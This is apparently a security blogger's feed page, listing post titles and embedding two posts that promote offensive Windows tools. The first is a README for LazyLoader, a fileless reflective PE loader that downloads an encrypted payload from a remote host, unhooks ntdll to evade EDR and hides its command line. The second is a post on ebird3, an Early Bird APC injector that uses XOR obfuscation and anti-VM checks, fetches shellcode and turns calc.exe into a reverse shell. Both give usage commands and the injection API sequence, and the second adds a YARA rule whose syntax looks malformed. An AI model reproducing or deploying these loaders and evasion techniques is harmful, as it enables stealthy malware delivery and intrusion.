Gris is Come BaCK

BlackSerpentine Python Beacon - Pure Python Cobalt Strike-like BOF Load...

noreply@blogger.com (GrisUNO) — Sat, 15 Nov 2025 12:44:05 -0800

Desgranando el Exploit - RTCore64 Privilege Escalation Technique

noreply@blogger.com (GrisUNO) — Wed, 12 Nov 2025 18:54:23 -0800

¿Un Código para la Conciencia?

noreply@blogger.com (GrisUNO) — Tue, 11 Nov 2025 14:40:03 -0800

Arquitectura moderna del control, percibida como un sistema totalizado, ...

noreply@blogger.com (GrisUNO) — Sat, 8 Nov 2025 17:10:00 -0800

Una Teoría del Todo como Teoría de Representaciones Coherentes en E8

noreply@blogger.com (GrisUNO) — Fri, 7 Nov 2025 20:26:13 -0800

Hackeando un controlador gráfico: Cómo un solo número codificado provoca...

noreply@blogger.com (GrisUNO) — Thu, 6 Nov 2025 18:54:16 -0800

Descifrando un Dispositivo "Propietario": Lecciones de Crear un Driver p...

noreply@blogger.com (GrisUNO) — Tue, 28 Oct 2025 19:14:14 -0700

Resucitando el Hardware, Ingeniería inversa a la Audiobox 22 VSL y un nu...

noreply@blogger.com (GrisUNO) — Mon, 27 Oct 2025 18:02:04 -0700

Liberating Hardware - VSL-DSP New driver on the hood - Presonus AudioBox...

noreply@blogger.com (GrisUNO) — Mon, 27 Oct 2025 17:48:19 -0700

Gopher 2.0 La Búsqueda de la Simplicidad en un Mundo Conectado

noreply@blogger.com (GrisUNO) — Sun, 26 Oct 2025 17:55:01 -0700

La BIBLIA ETÍOPE Revela lo que Jesús Dijo a sus Discípulos Después de su...

noreply@blogger.com (GrisUNO) — Sat, 25 Oct 2025 15:35:26 -0700

The LazyLoader Trilogy, Part III: When Your PE Gets a One-Way Ticket to ...

noreply@blogger.com (GrisUNO) — Thu, 16 Oct 2025 19:38:04 -0700

When Your Beacon Decides to Open a Cyber Café in Your Process Heap (And ...

noreply@blogger.com (GrisUNO) — Sun, 28 Sep 2025 20:34:00 -0700

Day 55 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sat, 27 Sep 2025 14:26:00 -0700

Day 53 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Mon, 22 Sep 2025 18:00:00 -0700

Day 52 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sun, 21 Sep 2025 19:55:00 -0700

# 🦎 LazyLoader — Stealthy Reflective PE Loader for Windows ᘛ⁐̤ᕐᐷ

Disclaimer: This tool is intended for educational purposes and authorized red team operations only. Do not use on systems you do not own or have explicit permission to test.

## 🧩 Overview

LazyLoader is a sophisticated, in-memory Windows PE (Portable Executable) loader that:

- Downloads an AES-256 encrypted PE file and its decryption key from a remote HTTP server.

- Decrypts the payload in memory using Windows CryptoAPI.

- Reflectively maps and relocates the PE into the current process.

- Repairs the Import Address Table (IAT) with optional API hooking to spoof command-line arguments and prevent process exit.

- Executes the payload in a new thread.

- Optionally unhooks ntdll.dll by restoring its .text section from a clean process (e.g., notepad.exe) to evade EDR/userland hooks.

- Designed for stealth, LazyLoader leaves no trace on disk and hides its execution context from command-line inspection tools.

## ⚙️ Features

- ✅ Remote Payload Fetching

Uses WinHTTP to securely download encrypted PE and key files from a remote server.

## ✅ AES-256 Decryption

- Leverages Windows CryptAcquireContext, CryptCreateHash, and CryptDecrypt for secure in-memory decryption.

## ✅ Reflective PE Loading

- Parses PE headers and sections.

- Allocates memory at preferred or relocated base.

- Copies headers and sections.

- Repairs IAT with dynamic GetProcAddress.

## ✅ Command-Line Masquerading

Spoofs:

- GetCommandLineA/W

- __p___argv

- __p___wargv

- __p___argc

- __getmainargs

- __wgetmainargs

Prevents detection via process argument inspection.

- ✅ **Exit Function Hooking**

Hooks exit, _exit, ExitProcess, etc., to redirect termination to ExitThread(0) — keeping the host process alive.

- ✅ **EDR Evasion via NTDLL Unhooking**

Optionally spawns a suspended notepad.exe, reads clean ntdll.dll from its memory, and restores hooked .text sections in the current process.

- ✅ **No Disk Artifacts**

Everything runs in memory — no temporary files written.

## 🚀 Usage

```cmd

LazyLoader.exe <Host> <Port> <EncryptedPEPath> <KeyPath>

```

### Example

```cmd

LazyLoader.exe 192.168.1.100 8080 /evil.bin /key.bin

```

### This will:

- Connect to http://192.168.1.100:8080/evil.bin and download the encrypted payload.

- Download the key from http://192.168.1.100:8080/key.bin.

- Decrypt the payload using AES-256.

- Spoof command-line to appear as "whatEver".

- Load and execute the PE reflectively.

## 🔐 Encryption Requirements

The payload must be encrypted with AES-256 in ECB mode (or compatible with Windows CryptDecrypt defaults).

Example Python encryption snippet:

```python

from Crypto.Cipher import AES

import hashlib

key = b"your-32-byte-key-here-------------" # Must be 32 bytes

data = open("payload.bin", "rb").read()

cipher = AES.new(key, AES.MODE_ECB)

encrypted = cipher.encrypt(data.ljust((len(data) // 16 + 1) * 16, b'\x00')) # PKCS#7-style padding

with open("evil.bin", "wb") as f:

f.write(encrypted)

```

## 🔍 Notes:

- LazyLoader uses SHA-256 to hash the key file contents before deriving the AES key — ensure your encryption matches this behavior.

- I only translate to C from C++ ( https://github.com/d1rkmtrr/FilelessPELoader/ ), because i like more C xd, and to learn, and this version compile in linux :D

## 🧪 Compilation

Requirements

x86_64-w64-mingw32-gcc

Libraries: WinHttp, Crypt32, Psapi

Build with x86_64-w64-mingw32-gcc

cmd

x86_64-w64-mingw32-gcc -o loader.exe main.c -lwinhttp -lcrypt32 -lpsapi

## 🛡️ Detection Evasion Techniques

### LoadLibrary

— avoids module enumeration.

IAT Repair + Hooking

Spoofs command-line and argv to hide true intent.

Exit Hooking

Redirects

ExitProcess

ExitThread

— host process stays alive.

NTDLL Unhooking

Restores clean

.text

from external process — defeats userland hooks.

No Disk Writes

Entire execution is memory-resident.

## 📜 License GPLv3

Educational & Red Team Use Only. Not for malicious exploitation.

## 📬 Contact / Contribution

For bugs, suggestions, or contributions — open an issue or submit a PR.

- Author: grisun0 - LazyOwn RedTeam

- Version: release/v0.0.1

- Year: 2025

## ⚠️ Legal Notice

This software is for authorized penetration testing and research purposes only. Misuse of this tool can result in criminal prosecution. The author(s) assume no liability and are not responsible for any misuse or damage caused by this program.

✅ Stay LazyOwn. Stay Stealthy.

![Python](https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54) ![Shell Script](https://img.shields.io/badge/shell_script-%23121011.svg?style=for-the-badge&logo=gnu-bash&logoColor=white) ![Flask](https://img.shields.io/badge/flask-%23000.svg?style=for-the-badge&logo=flask&logoColor=white) [![License: GPL v3](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y2Z73AV)

Day 49 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sat, 23 Aug 2025 18:16:00 -0700

Day 47 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Wed, 13 Aug 2025 16:06:00 -0700

> By: grisun0, White Hat Blogger & Chief Overthinker of Suspiciously Suspended Threads
5 min read · Probably posted at 3 AM because sleep is for the weak and the non-redteam

“The best way to be ninja is to inject into a calc.”
— grisun0 (probably xd)

Let’s cut the fluff.

If you’re reading this, you’re either:

A red teamer who just spent 4 hours trying to make notepad.exe whisper secrets in Morse code,
A blue teamer who found calc.exe establishing a TLS connection to Antarctica and now questions the nature of reality,
Or someone who Googled “how to make Windows do the robot” and ended up here.
(Spoiler: It’s easier than you think. And yes, the robot dance is included in the shellcode.)

Welcome to LazyOwn RedTeam™, where we don’t break systems — we educate them into submission.

Today, we’re unveiling ebird3 — my latest love letter to the Windows kernel, written in C, compiled with rage, and delivered via a technique so elegant, even your grandma’s antivirus won’t see it coming.

And yes — there’s a surprise at the end.
Spoiler: It involves a calculator.
Bigger spoiler: The calculator is now a reverse shell.
Even bigger spoiler: It’s still faster than your company’s IT ticket system.

🐣 What Is Early Bird APC Injection? (Or: “How to Hijack a Process Before It Even Wakes Up”)

Imagine this: You create a new process — say, calc.exe. But before it even opens its eyes, before it checks its email, before it mutters “Why am I always the target?”—you sneak in, inject your shellcode directly into its thread, queue an Asynchronous Procedure Call (APC), and then let it wake up.

It’s like sneaking into someone’s house, redecorating it as a spy lair, and then gently shaking them awake saying, “Surprise! You’re a cyber-agent now.”

This is Early Bird APC Injection — a stealthy, native, and gloriously underrated technique that bypasses most userland hooks because the process never runs its original code. It’s born already compromised.

And ebird3?
It’s not just a tool.
It’s a cybernetic assassin with string obfuscation, anti-VM checks, and a HTTP client that doesn’t rely on WinINet—because why use the front door when you can tunnel through the basement?

🔧 How ebird3 Works: A Ballet of NT API Calls and Digital Deception

Let me walk you through the graceful violence of ebird3:

1. String Obfuscation: “I Can’t See You, You Can’t See Me”

All strings — URL, process path, User-Agent — are XOR-encoded at compile time with a user-defined key (default: 0x33, because why not).

unsigned char OBF_SHELLCODE_URL[] = { 0x12, 0x34, … }; // “http://192.168.1.100/shellcode.txt” but cooler

At runtime, they’re decoded in memory — never touching disk in plaintext.
Because real hackers don’t leave IOCs. They are the IOC.

2. Anti-Analysis: “No Sandboxes Allowed”

Before doing anything, ebird3 checks the BIOS version in the registry:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

If it sees VMWARE, VBOX, QEMU, or XEN?
Game over. Exits silently.
No crash. No log. Just poof — like a ghost who read the room and decided it wasn’t cool enough.

3. Manual HTTP Client: “I Don’t Need WinHTTP. I Am the Web.”

Forget WinINet. Forget curl.
ebird3 uses raw WinSock to:

Resolve the host
Connect via TCP
Send a minimal HTTP GET request
Parse the response body
Extract \xNN\xNN... shellcode
XOR-decrypt it on the fly

All without a single external dependency.
It’s like building a spaceship out of duct tape and spite.

4. Early Bird APC: The Injection

Here’s the chef’s kiss:

1. CreateProcessA(“calc.exe”, …, CREATE_SUSPENDED); // Nap time, little process

2. NtAllocateVirtualMemory(hProcess, &mem, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

3. NtWriteVirtualMemory(hProcess, mem, shellcode, len, NULL); // Drop the payload

4. NtQueueApcThread(hThread, (PAPCFUNC)mem, NULL, NULL, NULL); // “Hey thread, when you wake up… do THIS”

5. ResumeThread(hThread); // *snap* Wakey wakey, eggs and payload

No WriteProcessMemory? No CreateRemoteThread?
Because those are for amateurs.

We’re using NT Native API calls from ntdll.dll—bypassing EDR userland hooks like a ghost through walls.

And since the APC executes before the main thread starts, no hook can catch it.
It’s not evasion.
It’s invisibility.

🛠️ Why ebird3 Is the Swiss Army Knife of Ethical Evil

✅ No Dependencies — Just ntdll.dll and ws2_32.dll. It’s like a survivalist, but with better opcodes.
✅ Obfuscated C2 — Your shellcode URL? XOR’d. Your User-Agent? XOR’d. Your dignity? Also XOR’d.
✅ Anti-VM — Sandboxes? Denied. Analysis? Thwarted. Paranoia? Validated.
✅ Small Binary Size — Compiled with -Os and -fno-stack-protector for maximum stealth and minimum bloat.
✅ Educational AF — Want to understand APC injection, NT API abuse, or how to make Windows cry? This is your lab.

🎭 But Wait — There’s More: The LazyOwn Ecosystem

ebird3 isn’t just a standalone tool.
It’s a node in the LazyOwn RedTeam Framework—a modular, extensible, and slightly unhinged ecosystem of offensive tools.

Imagine this:

You generate polymorphic shellcode with ShadowLink
Obfuscate it with LazyAddons
Deliver it via ebird3
All orchestrated by LazyOwn from a C2 server that looks like a cat meme blog

And the best part?
It’s all open-source.
(Because transparency is the best opsec.)

🎁 THE SURPRISE: A Calculator With a PhD in Hacking

👉 Watch it in action

Yes. That’s a Windows calc.exe:

Created suspended
Injected via NtQueueApcThread
Running XOR-obfuscated shellcode
Calling back to a Malleable C2 profile
All while Task Manager says “Looks normal to me”

And it’s not even using admin privileges.
It’s just that good.

🛡️ Detection? LOL. Here’s How to Catch It (For Blue Teams)

I’m not just a red teamer. I’m a responsible red teamer. So here’s some free blue team intel:

🔍 YARA Rule (Basic IOC)

yara

rule ebird3_EarlyBird_APC {

meta:

author = “LazyOwn BlueTeam Analyst”

description = “Detects ebird3 Early Bird APC injector”

license = “GPLv3”

strings:

$ntdll_imports = “ntdll.dll” ascii wide

$nt_funcs = (

“NtAllocateVirtualMemory”

“NtWriteVirtualMemory”

“NtQueueApcThread”

“NtClose”

)

$create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED

$xord_url = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 }

condition:

all of ($nt_funcs) and $ntdll_imports and $create_suspended and $xord_url

}

🕵️ Heuristic Alert

Look for:

NtQueueApcThread being called on a suspended process thread
Memory allocated with PAGE_EXECUTE_READWRITE
HTTP requests from calc.exe or notepad.exe with a legit User-Agent

If you see that?
You’ve been ebird3’d.

⚠️ Disclaimer (Because Lawyers Exist)

This tool is released under GPLv3 and is for educational and ethical red teaming purposes only.

Do not use it on systems you don’t own or have explicit permission to test.

Misuse may result in:

Getting fired
Getting sued
Getting haunted by the ghost of Linus Torvalds (he’s very serious about licenses)
Your calculator developing self-awareness

I assume zero liability. You’re on your own, cowboy.

🔗 Links (Because Sharing Is Caring)

🐙 GitHub: https://github.com/grisuno/ebird3
🐙 DeepWiki: https://deepwiki.com/grisuno/ebird3
🧠 LazyOwn Framework: https://github.com/grisuno/LazyOwn
🤖 ShadowLink: https://github.com/grisuno/ShadowLink
💬 Discord: https://discord.gg/V3usU8yH
🌐 Web: https://grisuno.github.io/LazyOwn/
🧑‍💻 HackTheBox: https://app.hackthebox.com/users/1998024
☕ Ko-fi: https://ko-fi.com/Y8Y2Z73AV (Buy me coffee. I’ll use it to fund more questionable decisions.)

🔚 Final Thoughts: Stay Sharp, Stay Sneaky, and Never Trust a Calculator

Tools like ebird3 exist to help us understand the battlefield.
To train blue teams.
To test defenses.
And yes—to make calc.exe do things it was never meant to do.

So go forth.
Learn.
Test.
Break things (ethically).
And remember:

The best security is the kind that makes you question whether your calculator is judging you.

🔐 grisun0, signing off — from my C2 server, probably running inside your printer.

Day 45 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sat, 9 Aug 2025 22:17:00 -0700

Day 42 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Thu, 31 Jul 2025 20:29:00 -0700

Day 41 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Wed, 30 Jul 2025 19:08:00 -0700

Day 34 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sat, 14 Jun 2025 00:27:00 -0700

Day 32 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Mon, 9 Jun 2025 22:46:00 -0700

Day 31 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Sun, 8 Jun 2025 22:22:00 -0700

Day 30 of 365: Mastering Pentesting with LazyOwn RedTeam - Daily Command...

noreply@blogger.com (GrisUNO) — Wed, 4 Jun 2025 23:03:00 -0700